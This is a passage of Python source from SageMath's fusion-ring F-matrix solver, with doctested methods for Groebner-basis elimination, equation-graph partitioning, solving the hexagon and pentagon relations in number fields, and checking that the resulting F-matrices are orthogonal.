self.pool._processes if self.pool is not None else 1\n params = [(child_id, n_proc, output) for child_id in range(n_proc)]\n eqns = self._map_triv_reduce('get_reduced_'+option, params, worker_pool=self.pool, chunksize=1, mp_thresh=0)\n if output:\n F = self._field\n for i, eq_tup in enumerate(eqns):\n eqns[i] = _unflatten_coeffs(F, eq_tup)\n return [self._tup_to_fpoly(p) for p in eqns]\n self.ideal_basis.extend(eqns)\n\n ############################\n ### Equations processing ###\n ############################\n\n def _tup_to_fpoly(self, eq_tup):\n r\"\"\"\n Assemble a polynomial object from its tuple representation.\n\n .. WARNING::\n\n This method avoids implicit casting when constructing a\n polynomial object, and may therefore lead to SEGFAULTs.\n It is meant for internal use by the F-matrix solver.\n\n This method is a left inverse of\n :meth:`sage.algebras.fusion_rings.poly_tup_engine.poly_to_tup`.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"C3\", 1).get_fmatrix()\n sage: f.start_worker_pool()\n sage: he = f.get_defining_equations('hexagons')\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_to_tup\n sage: all(f._tup_to_fpoly(poly_to_tup(h)) for h in he)\n True\n sage: f.shutdown_worker_pool()\n \"\"\"\n return _tup_to_poly(eq_tup, parent=self._poly_ring)\n\n def _update_reduction_params(self, eqns=None):\n r\"\"\"\n Update reduction parameters that are solver state attributes.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix()\n sage: f._reset_solver_state()\n sage: f.get_orthogonality_constraints(output=False)\n sage: f.start_worker_pool()\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.ideal_basis = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey, poly_to_tup\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: f.mp_thresh = 0\n sage: f._fvars = f._shared_fvars\n sage: f._triangular_elim(verbose=False) # indirect doctest\n sage: f.ideal_basis\n []\n sage: f.shutdown_worker_pool()\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n self._ks.update(eqns)\n for i, d in enumerate(get_variables_degrees(eqns, self._poly_ring.ngens())):\n self._var_degs[i] = d\n self._nnz = self._get_known_nonz()\n self._kp = compute_known_powers(self._var_degs, self._get_known_vals(), self._field.one())\n\n def _triangular_elim(self, eqns=None, verbose=True):\n r\"\"\"\n Perform triangular elimination of linear terms in two-term equations\n until no such terms exist.\n\n .. NOTE::\n\n For optimal usage of triangular elimination, pass in a\n *sorted* list of equations.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D3\", 1).get_fmatrix()\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.get_orthogonality_constraints(output=False)\n sage: gb = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey, poly_to_tup\n sage: f.ideal_basis = sorted(gb, key=poly_tup_sortkey)\n sage: from sage.algebras.fusion_rings.shm_managers import FvarsHandler\n sage: n = f._poly_ring.ngens()\n sage: f._fvars = FvarsHandler(n, f._field, f._idx_to_sextuple, init_data=f._fvars)\n sage: f._triangular_elim()\n Elimination epoch completed... 0 eqns remain in ideal basis\n sage: f.ideal_basis\n []\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n\n while True:\n linear_terms_exist = _solve_for_linear_terms(self, eqns)\n if not linear_terms_exist:\n break\n _backward_subs(self)\n # Compute new reduction params and update eqns\n self._update_reduction_params(eqns=eqns)\n if self.pool is not None and len(eqns) > self.mp_thresh:\n n = self.pool._processes\n chunks = [[] for i in range(n)]\n for i, eq_tup in enumerate(eqns):\n chunks[i%n].append(eq_tup)\n eqns = chunks\n else:\n eqns = [eqns]\n eqns = self._map_triv_reduce('update_reduce', eqns, worker_pool=self.pool, mp_thresh=0)\n eqns.sort(key=poly_tup_sortkey)\n if verbose:\n print(\"Elimination epoch completed... {} eqns remain in ideal basis\".format(len(eqns)))\n self.ideal_basis = eqns\n\n #####################\n ### Graph methods ###\n #####################\n\n def equations_graph(self, eqns=None):\n r\"\"\"\n Construct a graph corresponding to the given equations.\n\n Every node corresponds to a variable and nodes are connected when\n the corresponding variables appear together in an equation.\n\n INPUT:\n\n - ``eqns`` -- a list of polynomials\n\n Each polynomial is either an object in the ring returned by\n :meth:`get_poly_ring` or it is a tuple of pairs representing\n a polynomial using the internal representation.\n\n If no list of equations is passed, the graph is built from the\n polynomials in ``self.ideal_basis``. In this case the method assumes\n the internal representation of a polynomial as a tuple of pairs is\n used.\n\n This method is crucial to :meth:`find_orthogonal_solution`. The\n hexagon equations, obtained using :meth:`get_defining_equations`,\n define a disconnected graph that breaks up into many small components.\n The :meth:`find_orthogonal_solution` solver exploits this when\n undertaking a Groebner basis computation.\n\n OUTPUT:\n\n A ``Graph`` object. If a list of polynomial objects was given,\n the set of nodes in the output graph is the subset polynomial\n ring generators appearing in the equations.\n\n If the internal representation was used, the set of nodes is\n the subset of indices corresponding to polynomial ring generators.\n This option is meant for internal use by the F-matrix solver.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A3\", 1).get_fmatrix()\n sage: f.get_poly_ring().ngens()\n 27\n sage: he = f.get_defining_equations('hexagons')\n sage: graph = f.equations_graph(he)\n sage: graph.connected_components_sizes()\n [6, 3, 3, 3, 3, 3, 3, 1, 1, 1]\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n\n G = Graph()\n if not eqns:\n return G\n\n # Eqns could be a list of poly objects or poly tuples stored in internal repn\n if isinstance(eqns[0], tuple):\n G.add_vertices([x for eq_tup in eqns for x in variables(eq_tup)])\n else:\n G.add_vertices([x for eq in eqns for x in eq.variables()])\n for eq in eqns:\n # Eqns could be a list of poly objects or poly tuples stored in internal repn\n if isinstance(eq, tuple):\n s = [v for v in variables(eq)]\n else:\n s = [v for v in eq.variables()]\n for x in s:\n for y in s:\n if y!=x:\n G.add_edge(x, y)\n return G\n\n def _partition_eqns(self, eqns=None, verbose=True):\n r\"\"\"\n Partition equations corresponding to edges in a disconnected graph.\n\n OUTPUT:\n\n This method returns a dictionary of (c, e) pairs, where\n c is a tuple denoting a connected component in the graph produced\n by calling :meth:`equations_graph` with the given ``eqns`` and\n e is a list of all equations with variables in c.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"C2\", 1).get_fmatrix()\n sage: f.get_defining_equations('hexagons', output=False)\n sage: partition = f._partition_eqns()\n Partitioned 11 equations into 5 components of size:\n [4, 3, 3, 3, 1]\n sage: from sage.algebras.fusion_rings.poly_tup_engine import variables\n sage: for c, e in partition.items():\n ....: assert set(v for eq_tup in e for v in variables(eq_tup)) == set(c)\n sage: vars_in_partition = set()\n sage: eqns_in_partition = set()\n sage: for c, e in partition.items():\n ....: vars_in_partition.update(c)\n ....: eqns_in_partition.update(e)\n sage: vars_in_partition == set(v for eq_tup in f.ideal_basis for v in variables(eq_tup))\n True\n sage: eqns_in_partition == set(f.ideal_basis)\n True\n sage: from itertools import product\n sage: for e1, e2 in product(partition.values(), repeat=2):\n ....: assert e1 == e2 or set(e1).isdisjoint(set(e2))\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n graph = self.equations_graph(eqns)\n partition = {tuple(c): [] for c in graph.connected_components()}\n for eq_tup in eqns:\n partition[tuple(graph.connected_component_containing_vertex(variables(eq_tup)[0]))].append(eq_tup)\n if verbose:\n print(\"Partitioned {} equations into {} components of size:\".format(len(eqns), len(graph.connected_components())))\n print(graph.connected_components_sizes())\n return partition\n\n def _par_graph_gb(self, eqns=None, term_order=\"degrevlex\", largest_comp=45, verbose=True):\n r\"\"\"\n Compute a Groebner basis for a list of equations partitioned\n according to their corresponding graph.\n\n .. NOTE::\n\n If the graph has more than 50 components, this method computes the\n Groebner basis in parallel when a ``worker_pool`` is provided.\n\n This method will refuse to find a Groebner basis for a component\n of size larger than 60, since such a calculation does not seem to\n terminate.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"F4\", 1).get_fmatrix()\n sage: f._reset_solver_state()\n sage: f.get_orthogonality_constraints(output=False)\n sage: f.start_worker_pool()\n sage: f.get_defining_equations('hexagons', output=False)\n sage: gb = f._par_graph_gb()\n Partitioned 10 equations into 2 components of size:\n [4, 1]\n sage: from sage.algebras.fusion_rings.poly_tup_engine import _unflatten_coeffs\n sage: ret = [f._tup_to_fpoly(_unflatten_coeffs(f.field(), t)) for t in gb]\n sage: ret.sort(); ret\n [fx4 + (-zeta80^24 + zeta80^16),\n fx2 - fx3,\n fx1 + (zeta80^24 - zeta80^16),\n fx0 - 1,\n fx3^2 + (zeta80^24 - zeta80^16)]\n sage: f.shutdown_worker_pool()\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n small_comps = list()\n temp_eqns = list()\n for comp, comp_eqns in self._partition_eqns(eqns=eqns, verbose=verbose).items():\n # Check if component is too large to process\n if len(comp) > largest_comp:\n temp_eqns.extend(comp_eqns)\n else:\n small_comps.append(comp_eqns)\n input_iter = zip_longest(small_comps, [], fillvalue=term_order)\n small_comp_gb = self._map_triv_reduce('compute_gb', input_iter, worker_pool=self.pool, chunksize=1, mp_thresh=50)\n ret = small_comp_gb + temp_eqns\n return ret\n\n def _get_component_variety(self, var, eqns):\n r\"\"\"\n Translate equations in each connected component to smaller polynomial\n rings so we can call built-in variety method.\n\n INPUT:\n\n - ``var`` -- a list of variable indices\n - ``eqns`` -- a list of polynomial equations in the internal\n tuple of pairs representation\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 2).get_fmatrix(new=True)\n sage: f.start_worker_pool()\n sage: f.get_defining_equations('hexagons', output=False) # long time\n sage: f.shutdown_worker_pool()\n sage: partition = f._partition_eqns() # long time\n Partitioned 327 equations into 35 components of size:\n [27, 27, 27, 24, 24, 16, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12,\n 9, 9, 6, 6, 4, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 1, 1, 1, 1]\n sage: c = (216, 292, 319)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_to_tup\n sage: eqns = partition[c] + [poly_to_tup(f._poly_ring.gen(216)-1)] # long time\n sage: f._get_component_variety(c, eqns) # long time\n [{216: -1, 292: -1, 319: 1}]\n \"\"\"\n # Define smaller poly ring in component vars\n R = PolynomialRing(self._FR.field(), len(var), 'a', order='lex')\n\n # Zip tuples into R and compute Groebner basis\n idx_map = {old: new for new, old in enumerate(sorted(var))}\n nvars = len(var)\n eqns = [_unflatten_coeffs(self._field, eq_tup) for eq_tup in eqns]\n polys = [_tup_to_poly(resize(eq_tup, idx_map, nvars), parent=R) for eq_tup in eqns]\n var_in_R = Ideal(sorted(polys)).variety(ring=AA)\n\n # Change back to fmats poly ring and append to temp_eqns\n inv_idx_map = {v: k for k, v in idx_map.items()}\n return [{inv_idx_map[i]: value for i, (key, value) in enumerate(sorted(soln.items()))} for soln in var_in_R]\n\n #######################\n ### Solution method ###\n #######################\n\n # TODO: this can probably be improved by constructing a set of defining polynomials\n # and checking, one by one, if it's irreducible over the current field.\n # If it is, we construct an extension. Perhaps it's best to go one by one here...\n def attempt_number_field_computation(self):\n r\"\"\"\n Based on the ``CartanType`` of ``self`` and data\n known on March 17, 2021, determine whether to attempt\n to find a :func:`NumberField` containing all the F-symbols.\n\n This method is used by :meth:`find_orthogonal_solution`\n to determine a field containing all F-symbols.\n See :meth:`field` and :meth:`get_non_cyclotomic_roots`.\n\n For certain :class:`fusion rings `, the number field\n computation does not terminate in reasonable time.\n In these cases, we report F-symbols as elements\n of the :class:`QQbar`.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"F4\", 2).get_fmatrix()\n sage: f.attempt_number_field_computation()\n False\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.attempt_number_field_computation()\n True\n\n .. NOTE::\n\n In certain cases, F-symbols are found in the associated\n :class:`FusionRing`'s cyclotomic field and a\n :func:`NumberField` computation is not needed. In these\n cases this method returns ``True`` but the\n :meth:`find_orthogonal_solution` solver does *not*\n undertake a :func:`NumberField` computation.\n \"\"\"\n ct = self._FR.cartan_type()\n k = self._FR._k\n # Don't try when k is large and odd for SU(2)_k\n if ct.letter == 'A':\n if ct.n == 1 and k >= 9 and k % 2:\n return False\n if ct.letter == 'C':\n if ct.n >= 9 and ct.n % 2 and k == 1:\n return False\n if ct.letter == 'E':\n if ct.n < 8 and k == 2:\n return False\n if ct.n == 8 and k == 3:\n return False\n if ct.letter == 'F' and k == 2:\n return False\n if ct.letter == 'G' and k == 2:\n return False\n return True\n\n def _get_explicit_solution(self, eqns=None, verbose=True):\n r\"\"\"\n Construct an explicit solution of ``self``.\n\n When this method is called, the solution is already found in\n terms of Groeber basis. A few degrees of freedom remain.\n By specializing the free variables and back substituting, a\n solution in the base field is now obtained.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix() # indirect doctest\n sage: f.find_orthogonal_solution() # long time\n Computing F-symbols for The Fusion Ring of Type A1 and level 3 with Integer Ring coefficients with 71 variables...\n Set up 134 hex and orthogonality constraints...\n Partitioned 134 equations into 17 components of size:\n [12, 12, 6, 6, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 1, 1, 1]\n Elimination epoch completed... 10 eqns remain in ideal basis\n Elimination epoch completed... 0 eqns remain in ideal basis\n Hex elim step solved for 51 / 71 variables\n Set up 121 reduced pentagons...\n Elimination epoch completed... 18 eqns remain in ideal basis\n Elimination epoch completed... 5 eqns remain in ideal basis\n Pent elim step solved for 64 / 71 variables\n Partitioned 5 equations into 1 components of size:\n [4]\n Elimination epoch completed... 0 eqns remain in ideal basis\n Partitioned 6 equations into 6 components of size:\n [1, 1, 1, 1, 1, 1]\n Computing appropriate NumberField...\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n # Don't add square fixers when warm starting from a late-stage checkpoint\n if self._chkpt_status < 5:\n n = self._poly_ring.ngens()\n one = self._field.one()\n for fx, rhs in self._ks.items():\n if not self._solved[fx]:\n lt = (ETuple({fx: 2}, n), one)\n eqns.append(((lt, (ETuple({}, n), -rhs))))\n eqns_partition = self._partition_eqns(verbose=verbose)\n\n F = self._field\n R = F['x']\n numeric_fvars = dict()\n non_cyclotomic_roots = list()\n must_change_base_field = False\n phi = F.hom([F.gen()], F)\n for comp, part in eqns_partition.items():\n # If component has only one equation in a single variable, get a root\n if len(comp) == 1 and len(part) == 1:\n # Attempt to find cyclotomic root\n univ_poly = tup_to_univ_poly(part[0], R)\n roots = univ_poly.roots(multiplicities=False)\n if roots:\n numeric_fvars[comp[0]] = roots[0]\n else:\n # A real solution is preferred\n roots = univ_poly.roots(ring=AA, multiplicities=False)\n if not roots:\n roots = univ_poly.roots(ring=QQbar, multiplicities=False)\n non_cyclotomic_roots.append((comp[0], roots[0]))\n must_change_base_field = True\n # Otherwise, compute the component variety and select a point to obtain a numerical solution\n else:\n sols = self._get_component_variety(comp, part)\n for fx, rhs in sols[0].items():\n non_cyclotomic_roots.append((fx, rhs))\n must_change_base_field = True\n\n if must_change_base_field:\n # Attempt to compute smallest number field containing all the F-symbols\n # If calculation takes too long, we use QQbar as the base field\n if self.attempt_number_field_computation():\n if verbose:\n print(\"Computing appropriate NumberField...\")\n roots = [self._FR.field().gen()]+[r[1] for r in non_cyclotomic_roots]\n self._field, bf_elts, self._qqbar_embedding = number_field_elements_from_algebraics(roots, minimal=True)\n else:\n self._field = QQbar\n bf_elts = [self._qqbar_embedding(F.gen())]\n bf_elts += [rhs for fx, rhs in non_cyclotomic_roots]\n self._qqbar_embedding = lambda x : x\n self._non_cyc_roots = bf_elts[1:]\n\n # Embed cyclotomic field into newly constructed base field\n cyc_gen_as_bf_elt = bf_elts.pop(0)\n phi = self._FR.field().hom([cyc_gen_as_bf_elt], self._field)\n self._coerce_map_from_cyc_field = phi\n numeric_fvars = {k : phi(v) for k, v in numeric_fvars.items()}\n for i, elt in enumerate(bf_elts):\n numeric_fvars[non_cyclotomic_roots[i][0]] = elt\n # Update polynomial ring\n self._poly_ring = self._poly_ring.change_ring(self._field)\n\n # Ensure all F-symbols are known\n for fx in numeric_fvars:\n self._solved[fx] = True\n nvars = self._poly_ring.ngens()\n assert sum(self._solved) == nvars, \"Some F-symbols are still missing...{}\".format([self._poly_ring.gen(fx) for fx in range(nvars) if not self._solved[fx]])\n\n # Backward substitution step. Traverse variables in reverse lexicographical order. (System is in triangular form)\n self._fvars = {sextuple: apply_coeff_map(rhs, phi) for sextuple, rhs in self._fvars.items()}\n for fx, rhs in numeric_fvars.items():\n self._fvars[self._idx_to_sextuple[fx]] = ((ETuple({}, nvars), rhs), )\n _backward_subs(self, flatten=False)\n self._fvars = {sextuple: constant_coeff(rhs, self._field) for sextuple, rhs in self._fvars.items()}\n\n # Update base field attributes\n self._FR._field = self.field()\n self._FR._basecoer = self.get_coerce_map_from_fr_cyclotomic_field()\n if self._FR._basecoer:\n self._FR.r_matrix.clear_cache()\n\n def find_orthogonal_solution(self, checkpoint=False, save_results=\"\", warm_start=\"\", use_mp=True, verbose=True):\n r\"\"\"\n Solve the the hexagon and pentagon relations, along with\n orthogonality constraints, to evaluate an orthogonal F-matrix.\n\n INPUT:\n\n - ``checkpoint`` -- (default: ``False``) a boolean indicating whether\n the computation should be checkpointed. Depending on the associated\n ``CartanType``, the computation may take hours to complete. For\n large examples, checkpoints are recommended. This method supports\n \"warm\" starting, so the calculation may be resumed from a checkpoint,\n using the ``warm_start`` option.\n\n Checkpoints store necessary state in the pickle file\n ``\"fmatrix_solver_checkpoint_\" + key + \".pickle\"``, where ``key``\n is the result of :meth:`get_fr_str`.\n\n Checkpoint pickles are automatically deleted when the solver exits\n a successful run.\n\n - ``save_results`` -- (optional) a string indicating the name of a\n pickle file in which to store calculated F-symbols for later use.\n\n If ``save_results`` is not provided (default), F-matrix results\n are not stored to file.\n\n The F-symbols may be saved to file after running the solver using\n :meth:`save_fvars`.\n\n - ``warm_start`` -- (optional) a string indicating the name of a pickle\n file containing checkpointed solver state. This file must have been\n produced by a previous call to the solver using the ``checkpoint``\n option.\n\n If no file name is provided, the calculation begins from scratch.\n\n - ``use_mp`` -- (default: ``True``) a boolean indicating whether to use\n multiprocessing to speed up calculation. The default value\n ``True`` is highly recommended, since parallel processing yields\n results much more quickly.\n\n - ``verbose`` -- (default: ``True``) a boolean indicating whether the\n solver should print out intermediate progress reports.\n\n OUTPUT:\n\n This method returns ``None``. If the solver runs successfully, the\n results may be accessed through various methods, such as\n :meth:`get_fvars`, :meth:`fmatrix`, :meth:`fmat`, etc.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B5\", 1).get_fmatrix(fusion_label=\"b\", inject_variables=True)\n creating variables fx1..fx14\n Defining fx0, fx1, fx2, fx3, fx4, fx5, fx6, fx7, fx8, fx9, fx10, fx11, fx12, fx13\n sage: f.find_orthogonal_solution()\n Computing F-symbols for The Fusion Ring of Type B5 and level 1 with Integer Ring coefficients with 14 variables...\n Set up 25 hex and orthogonality constraints...\n Partitioned 25 equations into 5 components of size:\n [4, 3, 3, 3, 1]\n Elimination epoch completed... 0 eqns remain in ideal basis\n Hex elim step solved for 10 / 14 variables\n Set up 7 reduced pentagons...\n Elimination epoch completed... 0 eqns remain in ideal basis\n Pent elim step solved for 12 / 14 variables\n Partitioned 0 equations into 0 components of size:\n []\n Partitioned 2 equations into 2 components of size:\n [1, 1]\n sage: f.fmatrix(b2, b2, b2, b2)\n [ 1/2*zeta80^30 - 1/2*zeta80^10 -1/2*zeta80^30 + 1/2*zeta80^10]\n [ 1/2*zeta80^30 - 1/2*zeta80^10 1/2*zeta80^30 - 1/2*zeta80^10]\n sage: f.fmat(b2, b2, b2, b2, b0, b1)\n -1/2*zeta80^30 + 1/2*zeta80^10\n\n Every F-matrix `F^{a, b, c}_d` is orthogonal and in many cases real.\n We may use :meth:`fmats_are_orthogonal` and :meth:`fvars_are_real`\n to obtain correctness certificates.\n\n EXAMPLES::\n\n sage: f.fmats_are_orthogonal()\n True\n\n In any case, the F-symbols are obtained as elements of the associated\n :class:`FusionRing`'s\n :class:`Cyclotomic field`,\n a computed :func:`NumberField`, or :class:`QQbar`.\n Currently, the field containing the F-symbols is determined based\n on the ``CartanType`` associated to ``self``.\n\n .. SEEALSO::\n\n :meth:`attempt_number_field_computation`\n \"\"\"\n if self._poly_ring.ngens() == 0:\n return\n self._reset_solver_state()\n\n # Resume computation from checkpoint\n if warm_start:\n self._restore_state(warm_start)\n # Loading from a pickle with solved F-symbols\n if self._chkpt_status > 5:\n return\n if use_mp:\n self.start_worker_pool()\n if verbose:\n print(\"Computing F-symbols for {} with {} variables...\".format(self._FR, self._poly_ring.ngens()))\n\n if self._chkpt_status < 1:\n # Set up hexagon equations and orthogonality constraints\n self.get_orthogonality_constraints(output=False)\n self.get_defining_equations('hexagons', output=False)\n # Report progress\n if verbose:\n print(\"Set up {} hex and orthogonality constraints...\".format(len(self.ideal_basis)))\n\n # Unzip _fvars and link to shared_memory structure if using multiprocessing\n if use_mp:# and loads_shared_memory:\n self._fvars = self._shared_fvars\n else:\n n = self._poly_ring.ngens()\n self._fvars = FvarsHandler(n, self._field, self._idx_to_sextuple, init_data=self._fvars)\n self._checkpoint(checkpoint, 1, verbose=verbose)\n\n if self._chkpt_status < 2:\n # Set up equations graph. Find GB for each component in parallel. Eliminate variables\n self.ideal_basis = self._par_graph_gb(verbose=verbose)\n self.ideal_basis.sort(key=poly_tup_sortkey)\n self._triangular_elim(verbose=verbose)\n # Report progress\n if verbose:\n print(\"Hex elim step solved for {} / {} variables\".format(sum(self._solved), len(self._poly_ring.gens())))\n self._checkpoint(checkpoint, 2, verbose=verbose)\n\n if self._chkpt_status < 3:\n # Set up pentagon equations in parallel\n self.get_defining_equations('pentagons', output=False)\n # Report progress\n if verbose:\n print(\"Set up {} reduced pentagons...\".format(len(self.ideal_basis)))\n self._checkpoint(checkpoint, 3, verbose=verbose)\n\n if self._chkpt_status < 4:\n # Simplify and eliminate variables\n self.ideal_basis.sort(key=poly_tup_sortkey)\n self._triangular_elim(verbose=verbose)\n # Report progress\n if verbose:\n print(\"Pent elim step solved for {} / {} variables\".format(sum(self._solved), len(self._poly_ring.gens())))\n self._checkpoint(checkpoint, 4, verbose=verbose)\n\n # Try adding degrevlex gb -> elim loop until len(ideal_basis) does not change\n\n # Set up new equations graph and compute variety for each component\n if self._chkpt_status < 5:\n self.ideal_basis = self._par_graph_gb(term_order=\"lex\", verbose=verbose)\n self.ideal_basis.sort(key=poly_tup_sortkey)\n self._triangular_elim(verbose=verbose)\n self._checkpoint(checkpoint, 5, verbose=verbose)\n self.shutdown_worker_pool()\n\n # Find numeric values for each F-symbol\n self._get_explicit_solution(verbose=verbose)\n # The calculation was successful, so we may delete checkpoints\n self._chkpt_status = 7\n self.clear_equations()\n if checkpoint:\n remove(\"fmatrix_solver_checkpoint_\"+self.get_fr_str()+\".pickle\")\n if save_results:\n self.save_fvars(save_results)\n\n #########################\n ### Cyclotomic method ###\n #########################\n\n def _fix_gauge(self, algorithm=\"\"):\n r\"\"\"\n Fix the gauge by forcing F-symbols not already fixed to equal `1`.\n\n .. NOTE::\n\n This method should be used *after* adding hexagon and pentagon\n equations to ``self.ideal_basis``.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A3\", 1).get_fmatrix()\n sage: f._reset_solver_state() # long time\n sage: f._var_to_sextuple = {f._poly_ring.gen(i): s for i, s in f._idx_to_sextuple.items()} # long time\n sage: eqns = f.get_defining_equations(\"hexagons\")+f.get_defining_equations(\"pentagons\") # long time\n sage: f.ideal_basis = set(Ideal(eqns).groebner_basis()) # long time\n sage: _, _ = f._substitute_degree_one() # long time\n sage: f._fix_gauge() # long time\n adding equation... fx1 - 1\n adding equation... fx18 - 1\n adding equation... fx21 - 1\n \"\"\"\n while not all(v for v in self._solved):\n # Get a variable that has not been fixed\n # In ascending index order, for consistent results\n for i, var in enumerate(self._poly_ring.gens()):\n if not self._solved[i]:\n break\n\n # Fix var = 1, substitute, and solve equations\n self.ideal_basis.add(var-1)\n print(\"adding equation...\", var-1)\n self.ideal_basis = set(Ideal(list(self.ideal_basis)).groebner_basis(algorithm=algorithm))\n self._substitute_degree_one()\n self._update_equations()\n\n def _substitute_degree_one(self, eqns=None):\n r\"\"\"\n Substitute known value from linear univariate polynomial and\n solve, following [Bond2007]_ p.37, for two-term linear equation\n for one of the variables.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"D3\", 1)\n sage: f = fr.get_fmatrix(inject_variables=True, new=True)\n creating variables fx1..fx27\n Defining fx0, ..., fx26\n sage: f._reset_solver_state()\n sage: f._var_to_sextuple = {f._poly_ring.gen(i): s for i, s in f._idx_to_sextuple.items()}\n sage: f.ideal_basis = [fx0 - 8, fx4**2 - 3, fx4 + fx10 + 3, fx4 + fx9]\n sage: _, _ = f._substitute_degree_one()\n sage: f._fvars[f._var_to_sextuple[fx0]]\n 8\n sage: f._fvars[f._var_to_sextuple[fx4]]\n -fx9\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n\n new_knowns = set()\n useless = set()\n for eq in eqns:\n if eq.degree() == 1 and sum(eq.degrees()) <= 2 and eq.lm() not in self._solved:\n self._fvars[self._var_to_sextuple[eq.lm()]] = -sum(c * m for c, m in zip(eq.coefficients()[1:], eq.monomials()[1:])) / eq.lc()\n # Add variable to set of known values and remove this equation\n new_knowns.add(eq.lm())\n useless.add(eq)\n\n # Update fvars depending on other variables\n for idx, fx in enumerate(self._poly_ring.gens()):\n if fx in new_knowns:\n self._solved[idx] = fx\n for sextuple, rhs in self._fvars.items():\n d = {var: self._fvars[self._var_to_sextuple[var]] for var in rhs.variables() if var in self._solved}\n if d:\n self._fvars[sextuple] = rhs.subs(d)\n return new_knowns, useless\n\n def _update_equations(self):\n r\"\"\"\n Perform backward substitution on equations in ``self.ideal_basis``.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"D3\", 1)\n sage: f = fr.get_fmatrix(inject_variables=True, new=True)\n creating variables fx1..fx27\n Defining fx0, ..., fx26\n sage: f._reset_solver_state()\n sage: f._var_to_sextuple = {f._poly_ring.gen(i): s for i, s in f._idx_to_sextuple.items()}\n sage: f.ideal_basis = [fx0 - 8, fx4 + fx9, fx4**2 + fx3 - fx9**2]\n sage: _, _ = f._substitute_degree_one()\n sage: f._update_equations()\n sage: f.ideal_basis\n {fx3}\n \"\"\"\n special_values = {known: self._fvars[self._var_to_sextuple[known]] for known in self._solved if known}\n self.ideal_basis = set(eq.subs(special_values) for eq in self.ideal_basis)\n self.ideal_basis.discard(0)\n\n def find_cyclotomic_solution(self, equations=None, algorithm=\"\", verbose=True, output=False):\n r\"\"\"\n Solve the hexagon and pentagon relations to evaluate the F-matrix.\n\n This method (omitting the orthogonality constraints) produces\n output in the cyclotomic field, but it is very limited in the size\n of examples it can handle: for example, `G_2` at level 2 is\n too large for this method. You may use :meth:`find_orthogonal_solution`\n to solve much larger examples.\n\n INPUT:\n\n - ``equations`` -- (optional) a set of equations to be\n solved; defaults to the hexagon and pentagon equations\n - ``algorithm`` -- (optional) algorithm to compute Groebner Basis\n - ``output`` -- (default: ``False``) output a dictionary of\n F-matrix values; this may be useful to see but may be omitted\n since this information will be available afterwards via the\n :meth:`fmatrix` and :meth:`fmat` methods.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"A2\", 1, fusion_labels=\"a\", inject_variables=True)\n sage: f = fr.get_fmatrix(inject_variables=True)\n creating variables fx1..fx8\n Defining fx0, fx1, fx2, fx3, fx4, fx5, fx6, fx7\n sage: f.find_cyclotomic_solution(output=True)\n Setting up hexagons and pentagons...\n Finding a Groebner basis...\n Solving...\n Fixing the gauge...\n adding equation... fx4 - 1\n Done!\n {(a2, a2, a2, a0, a1, a1): 1,\n (a2, a2, a1, a2, a1, a0): 1,\n (a2, a1, a2, a2, a0, a0): 1,\n (a2, a1, a1, a1, a0, a2): 1,\n (a1, a2, a2, a2, a0, a1): 1,\n (a1, a2, a1, a1, a0, a0): 1,\n (a1, a1, a2, a1, a2, a0): 1,\n (a1, a1, a1, a0, a2, a2): 1}\n\n After you successfully run :meth:`find_cyclotomic_solution` you may\n check the correctness of the F-matrix by running\n :meth:`get_defining_equations` with ``option='hexagons'`` and\n ``option='pentagons'``. These should return empty lists\n of equations.\n\n EXAMPLES::\n\n sage: f.get_defining_equations(\"hexagons\")\n []\n sage: f.get_defining_equations(\"pentagons\")\n []\n \"\"\"\n if self._poly_ring.ngens() == 0:\n return\n self._reset_solver_state()\n self._var_to_sextuple = {self._poly_ring.gen(i): s for i, s in self._idx_to_sextuple.items()}\n\n if equations is None:\n if verbose:\n print(\"Setting up hexagons and pentagons...\")\n equations = self.get_defining_equations(\"hexagons\")+self.get_defining_equations(\"pentagons\")\n if verbose:\n print(\"Finding a Groebner basis...\")\n self.ideal_basis = set(Ideal(equations).groebner_basis(algorithm=algorithm))\n if verbose:\n print(\"Solving...\")\n self._substitute_degree_one()\n if verbose:\n print(\"Fixing the gauge...\")\n self._fix_gauge(algorithm=algorithm)\n if verbose:\n print(\"Done!\")\n if output:\n return self._fvars\n\n #####################\n ### Verifications ###\n #####################\n\n def fmats_are_orthogonal(self):\n r\"\"\"\n Verify that all F-matrices are orthogonal.\n\n This method should always return ``True`` when called after running\n :meth:`find_orthogonal_solution`.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D4\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.fmats_are_orthogonal()\n True\n \"\"\"\n is_orthog = []\n for a, b, c, d in product(self._FR.basis(), repeat=4):\n mat = self.fmatrix(a, b, c, d)\n is_orthog.append(mat.T * mat == matrix.identity(mat.nrows()))\n return all(is_orthog)\n\n def fvars_are_real(self):\n 